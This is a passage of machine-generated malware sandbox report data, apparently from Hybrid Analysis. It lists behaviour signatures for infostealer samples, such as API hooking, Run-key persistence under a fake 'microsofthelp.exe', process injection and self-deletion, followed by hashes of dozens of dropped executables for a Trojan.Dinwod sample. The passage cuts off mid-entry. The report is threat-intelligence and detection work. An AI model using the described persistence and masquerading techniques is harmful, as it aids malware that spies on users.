\"microsofthelp.exe\"\n \"CreateToolhelp32Snapshot@KERNEL32.DLL\" in \"microsofthelp.exe\"\n \"FindNextFileW@KERNEL32.DLL\" in \"microsofthelp.exe\"\n \"FindResourceW@KERNEL32.DLL\" in \"microsofthelp.exe\"\n \"GetLogicalDriveStringsW@KERNEL32.DLL\" in \"microsofthelp.exe\"\n \"send@WS2_32.DLL\" in \"microsofthelp.exe\"\n \"LoadLibraryW@KERNEL32.DLL\" in \"microsofthelp.exe\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-136", "type": 3, "relevance": 3, "name": "Writes registry keys", "description": "\"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"MICROSOFTHELP\"; Value: \"%WINDIR%\\microsofthelp.exe\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"microsofthelp.exe\" marked \"C:\\a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"microsofthelp.exe\" opened \"C:\\a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\microsofthelp.exe\" (Handle: 144)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\microsofthelp.exe\" (Handle: 144)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\microsofthelp.exe\" (Handle: 144)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "binary-7", "type": 8, "relevance": 7, "name": "Drops executable files to the Windows system directory", "description": "File type \"MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows MZ for MS-DOS\" was dropped at \"%WINDIR%\\microsofthelp.exe\"", "origin": "Binary File", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "hooks-2", "type": 11, "relevance": 10, "name": "Hooks file system APIs", "description": "\"FindFirstFileW@KERNEL32.DLL\" in \"microsofthelp.exe\"\n \"FindNextFileW@KERNEL32.DLL\" in \"microsofthelp.exe\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"microsofthelp.exe\"\n \"FindNextFileA@KERNEL32.DLL\" in \"microsofthelp.exe\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Spyware/Information Retrieval", "identifier": "hooks-5", "type": 11, "relevance": 10, "name": "Hooks internet related APIs", "description": "\"send@WS2_32.DLL\" in \"microsofthelp.exe\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f
https://hybrid-analysis.com/sample/4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f
Hybrid Analysis - Infostealers
{"size": 342144, "type": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "submit_name": "4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f", "sha256": "4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f", "av_detect": 96, "vx_family": "Trojan.Dinwod", "threat_score": 85, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "The operation completed successfully. (0x0)", "total_processes": 64, "total_signatures": 98, "extracted_files": [{"name": "0020002.exe", "file_path": "C:\\0020002.exe", "file_size": 342186, "sha256": "4767bccfbc3627a43d7415ebfe17c2630fc88b1e20eea89ba28620a7644d14dd", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "lnvjpll.exe (PID: 5940)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "0228060.exe", "file_path": "C:\\0228060.exe", "file_size": 342228, "sha256": "915b37da5e4954ba604c97cb8b7e02e2ecc589ca1c52c30126252f7d849f9dc1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "0228060.exe (PID: 4128)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "04620.exe", "file_path": "C:\\04620.exe", "file_size": 342713, "sha256": "b2ffc573882e436646fa90d61bff6e6411b6b99d1f875e63d8816f7950a3bea5", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "04620.exe (PID: 4048)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "0488840.exe", "file_path": "C:\\0488840.exe", "file_size": 342510, "sha256": "c92248c3cf66ca78f2514d4e72222a3a3bc01622630cdb580b75a6db30294f67", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "0488840.exe (PID: 2820)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "062080.exe", "file_path": "C:\\062080.exe", "file_size": 342401, "sha256": "15854885050bc474c642460352b16b32844f3a8ef81413e2a779e9a451c3d6ab", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "6248060.exe (PID: 4348)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "08246.exe", "file_path": "C:\\08246.exe", "file_size": 342584, "sha256": "efb9da3340e5a915f986e067c087173028212236ccf24c88c9689e1fef89cb1c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "288226.exe (PID: 2228)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "086880.exe", "file_path": "C:\\086880.exe", "file_size": 342418, "sha256": "e57018a23a3ddc43ac3a9ba037537ef0ae4ae31ec98d34c2bbcea9bed146cfd6", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "062080.exe (PID: 2560)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "206020.exe", "file_path": "C:\\206020.exe", "file_size": 342674, "sha256": "326ebe0c7c65ae2857a895a36f12e8f159faa9705b88864634889457f458e494", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "206020.exe (PID: 1952)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "220440.exe", "file_path": "C:\\220440.exe", "file_size": 342688, "sha256": "04426c75a142ef3ff758ea708f64fa2ed087712111a030d138d929aab7a7855d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "206020.exe (PID: 1952)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "22202.exe", "file_path": "C:\\22202.exe", "file_size": 342340, "sha256": "d5335f39002d969a78558c508bb09ef7a6716a3149ac7d386864fd679ee4b2f8", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "22202.exe (PID: 4260)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "280282.exe", "file_path": "C:\\280282.exe", "file_size": 342494, "sha256": "a8ffcf4cca584742b3f38f625f31bbd5f6f3f35435f71791931537a56b2f3cee", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "66206.exe (PID: 4236)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "288226.exe", "file_path": "C:\\288226.exe", "file_size": 342567, "sha256": "2dbe16589d1a382bdcb6660bbb49f6c2f4b304e02aba36b069989b7a8c4b5ed3", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "6620064.exe (PID: 2536)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "408802.exe", "file_path": "C:\\408802.exe", "file_size": 342303, "sha256": "2cbad83a6974ab353f31b84e00510aecaf6aa36475ba4515ed1adb18e1dc2c67", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "rpbpdxh.exe (PID: 4168)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "42866.exe", "file_path": "C:\\42866.exe", "file_size": 342453, "sha256": "75bde4695422c56dbb929b36bed432f35cb81d261ad3ace428e66b38fd8414ec", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "42866.exe (PID: 3768)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4404242.exe", "file_path": "C:\\4404242.exe", "file_size": 342247, "sha256": "d50e88d2cf9516093040bf3063e41cd11d7250658d4bf22997f1009f26af9189", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "4404242.exe (PID: 6140)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4424228.exe", "file_path": "C:\\4424228.exe", "file_size": 342433, "sha256": "1a82b5c896774b1ab8e8df28b2b4fc0c5390b7ec08c485fc045cf50ad4dfe6a3", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "086880.exe (PID: 2780)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4602048.exe", "file_path": "C:\\4602048.exe", "file_size": 343080, "sha256": "ec2d67eb9f76e52465b89456939e3210f82a3d93224c7516db7c02c1e4f0b9d5", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "822462.exe (PID: 4620)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "600468.exe", "file_path": "C:\\600468.exe", "file_size": 342468, "sha256": "99ce79fb5bcc3efc09e14284e6cc146eee82004b5a72bd404d27e7383151454e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "42866.exe (PID: 3768)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "620206.exe", "file_path": "C:\\620206.exe", "file_size": 342725, "sha256": "144ac0e049a2740002c3c21908d047a16b1da8bd237177a63953b2607628c75b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "04620.exe (PID: 4048)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "6248060.exe", "file_path": "C:\\6248060.exe", "file_size": 342381, "sha256": "3c83d38be72925961f7f426df4c6eda5b765b21bcad02b7200eb4427849d807b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "vrdnrx.exe (PID: 3912)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "6264048.exe", "file_path": "C:\\6264048.exe", "file_size": 343020, "sha256": "e5d337a926ff6aafdb9ca4a4a01ee885ee1241fec2722c2612b0ae71d106feda", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "6264048.exe (PID: 3800)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "6620064.exe", "file_path": "C:\\6620064.exe", "file_size": 342556, "sha256": "97df74e8c31bb982c73d9f5c01f47fbe0dde59f6c171c42748c98f1857850735", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "6620064.exe (PID: 2536)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "66206.exe", "file_path": "C:\\66206.exe", "file_size": 342484, "sha256": "60b8f268dc4bb1bcf9c59f15b1d3ca4ed168384f736f9c65b6eed58f466aae61", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "66206.exe (PID: 4236)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "664222.exe", "file_path": "C:\\664222.exe", "file_size": 343030, "sha256": "36a3ed8db1bfdf1f1383f29c05a4c93fadf2bfab0b99677b18251cb63b8dd290", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "6264048.exe (PID: 3800)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "6644862.exe", "file_path": "C:\\6644862.exe", "file_size": 342316, "sha256": "2f7816ca8ba85e79cc8b158aeb3ccf66939d167678ca0df9102c76e010d63f3d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "6644862.exe (PID: 3396)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "666086.exe", "file_path": "C:\\666086.exe", "file_size": 343009, "sha256": "18d4f041e3600f3b33a68c5eb77f9ea10d0f5fcbfd19115a2cd918df98189f58", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "thbfpv.exe (PID: 3064)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "8024206.exe", "file_path": "C:\\8024206.exe", "file_size": 343047, "sha256": "579697a73ac05fe194fce8aab2afee9aaf421150dd2737837dc37b8141f4ef4d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "664222.exe (PID: 3580)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "802862.exe", "file_path": "C:\\802862.exe", "file_size": 342202, "sha256": "b07de5065b7ba0433e1877479339d884893fc147d490fa23d751bc94e2d73c3a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "802862.exe (PID: 4124)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "8204220.exe", "file_path": "C:\\8204220.exe", "file_size": 342699, "sha256": "71a44f27b117736ddd1d45f8c54005abf1b599a4cd7f4e264bd302d7a9028807", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "220440.exe (PID: 2676)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "824686.exe", "file_path": "C:\\824686.exe", "file_size": 342215, "sha256": "f3e14519e114ada80e528ed760c27f975d7f6a9d230bb9b3553ed006f13bc328", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "802862.exe (PID: 4124)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "848682.exe", "file_path": "C:\\848682.exe", "file_size": 342660, "sha256": "4ae2fa382a504674aef02c917a65a62aad266b9ddc599588c346be4a54505dc6", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "848682.exe (PID: 3744)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "848862.exe", "file_path": "C:\\848862.exe", "file_size": 342328, "sha256": "301a2419e560ad34cf2b9c70147b0f7b0c18d432304d43e37bb7dc6770ed3fc2", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "6644862.exe (PID: 3396)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "bjjnnr.exe", "file_path": "C:\\bjjnnr.exe", "file_size": 342752, "sha256": "dd173dcaa3a4741b1a06e0c7e5b7273497714013b7b18346ac466d7f66b97c40", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "dvfrj.exe (PID: 500)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "bnrrj.exe", "file_path": "C:\\bnrrj.exe", "file_size": 342541, "sha256": "5770b97cd72f3ca93675a1c4b2460ec93bad4dc099124f6fcf441e0c10aabd5b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "bnrrj.exe (PID: 4304)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "brbjvx.exe", "file_path": "C:\\brbjvx.exe", "file_size": 342929, "sha256": "7383b87201c3d0bf38209d6a3e67dd39168625ffbe22332223bf4f97f70c38a4", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "brbjvx.exe (PID: 3976)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dhfjp.exe", "file_path": "C:\\dhfjp.exe", "file_size": 342596, "sha256": "98270b68ba09d1523622da9c5593b098786338e931e9ea383d3c3863b183276a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "dhfjp.exe (PID: 3712)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dhxhp.exe", "file_path": "C:\\dhxhp.exe", "file_size": 342163, "sha256": "69a81abb8f31649de32e91b3bb38bc28a44179febe37dbd0b650371729e2897c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "dhxhp.exe (PID: 5988)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dvfrj.exe", "file_path": "C:\\dvfrj.exe", "file_size": 342738, "sha256": "9ac9d6a7c92995e4dee09c703327886d91521f822be19449dcf7094992b9ba9e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "dvfrj.exe (PID: 500)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dvlplh.exe", "file_path": "C:\\dvlplh.exe", "file_size": 342627, "sha256": "557c4587ed6d44b82e932d8254ca3c8e7ac761f8a2efe3c9368a73434d774545", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "dvlplh.exe (PID: 3888)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dvrdf.exe", "file_path": "C:\\dvrdf.exe", "file_size": 342257, "sha256": "e8674f84de8d161e8bc7c811affb53705beb588b637eeb487c2d56edb1e00ff9", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "dvrdf.exe (PID: 4308)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "ffpprbb.exe", "file_path": "C:\\ffpprbb.exe", "file_size": 342894, "sha256": "f5f3ecd5225e96f1edd0189ec00b684061ab8fef8ff898e9914438e9828ea650", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "ffpprbb.exe (PID: 900)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "fhjvtn.exe", "file_path": "C:\\fhjvtn.exe", "file_size": 342802, "sha256": "a97ae1a5610182836c154cddeefa18d8fb3622c03d7e5c46fb0f20669a85b9bb", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "tfvnr.exe (PID: 984)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "fxpnhnj.exe", "file_path": "C:\\fxpnhnj.exe", "file_size": 342817, "sha256": "abc1099e522ce8d7217e88d4603e2e5a26d522f5c3c1182fc8cd9fc1d552a09e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "fxpnhnj.exe (PID: 2192)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "jhftx.exe", "file_path": "C:\\jhftx.exe", "file_size": 343091, "sha256": "24d8ec603329b2b563925167d22d771b94c2a726574669e824217c0d099bf17b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "4602048.exe (PID: 1728)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "jplfnb.exe", "file_path": "C:\\jplfnb.exe", "file_size": 342766, "sha256": "950d78ba827c5f269be6a8c1402163e3f63f94791ce2693b7b62c76450997963", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "bjjnnr.exe (PID: 4524)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "jxbtp.exe", "file_path": "C:\\jxbtp.exe", "file_size": 342614, "sha256": "bfc046286608d6bb3c9f259aab4fd11f6e9e382c8dfc250c5cf2288a3bc8e104", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "dhfjp.exe (PID: 3712)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "ldjdlxp.exe", "file_path": "C:\\ldjdlxp.exe", "file_size": 342837, "sha256": "075c101970ed07024ecfdb25c98ad0d32da2fd54f3bcca1608dc4fac8ddadc0f", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "fxpnhnj.exe (PID: 2192)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "lnvjpll.exe", "file_path": "C:\\lnvjpll.exe", "file_size": 342175, "sha256": "079b6f599d31e78de88a0f230da005e4ba628d4ae18abc54dac97ab202a6eed0", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "dhxhp.exe (PID: 5988)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "lvlfrln.exe", "file_path": "C:\\lvlfrln.exe", "file_size": 342355, "sha256": "46734a5ae006a380695a1d5f5a572ad0dcf60284b980165c645e97d29aa89de3", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "22202.exe (PID: 4260)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "nrdphjv.exe", "file_path": "C:\\nrdphjv.exe", "file_size": 342272, "sha256": "517e048d6f2de0b9e391b00f18af92a0ac234010738d20b1320b29085836248e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "dvrdf.exe (PID: 4308)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "nvlntp.exe", "file_path": "C:\\nvlntp.exe", "file_size": 342646, "sha256": "6308296ecf0029cf792b6ef1ab6bf372321040be76afba9861e177bbb7bac93b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "dvlplh.exe (PID: 3888)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "ptfff.exe", "file_path": "C:\\ptfff.exe", "file_size": 342959, "sha256": "086a8f8e8ca206ef47d9fadd60d4c395e5345d27576c028bf808fdc15f28be4b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "ptfff.exe (PID: 4536)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "ptvbh.exe", "file_path": "C:\\ptvbh.exe", "file_size": 342530, "sha256": "1b4466cfa82549fb5bbd5f121685870063dc69eabb4c925227d1931de7b44b50", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "0488840.exe (PID: 2820)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rpbpdxh.exe", "file_path": "C:\\rpbpdxh.exe", "file_size": 342285, "sha256": "b723374f293dd53fd3d21d1ab96b39e3df50f819bbf7e06ed1dd78b2d24ce392", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "rpbpdxh.exe (PID: 4168)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "tfvnr.exe", "file_path": "C:\\tfvnr.exe", "file_size": 342786, "sha256": "d9ea1a5eb9b296e8a3ad6adc8fb7356e91ba9d4958fa3d24915a01268d563e79", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "tfvnr.exe (PID: 984)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "thbfpv.exe", "file_path": "C:\\thbfpv.exe", "file_size": 342990, "sha256": "4ad798065f662225dcc007d2364b7e88042aab34138db8a254d35b455816262f", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "thbfpv.exe (PID: 3064)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "ttnbl.exe", "file_path": "C:\\ttnbl.exe", "file_size": 342971, "sha256": "54c5e3b27eba4a7e8b831638d375d61ef6ab94292a8742badcd1811ecdf4831a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "ptfff.exe (PID: 4536)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "ttrtrr.exe", "file_path": "C:\\ttrtrr.exe", "file_size": 342856, "sha256": "39ccd3b667834900c4f417ffff7d4e0725ed2f319e09b3d1826c0bbf960b36f2", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "ttrtrr.exe (PID: 2528)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "vrdnrx.exe", "file_path": "C:\\vrdnrx.exe", "file_size": 342366, "sha256": "d12f1d44462bd0d501887ffea09047442daea72ca1f402868a575d5a670c874e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "vrdnrx.exe (PID: 3912)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "vtxfp.exe", "file_path": "C:\\vtxfp.exe", "file_size": 342884, "sha256": "161c1e280750084c7eed736b6f83351f7ffe87f2fcf999c7ed589dad0b69455c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "xjjln.exe (PID: 3248)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "xjjln.exe", "file_path": "C:\\xjjln.exe", "file_size": 342874, "sha256": "10a6466d27ca30d269242aff58e71593ba5ea860800d7afbe9cbe978e63e2df5", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "xjjln.exe 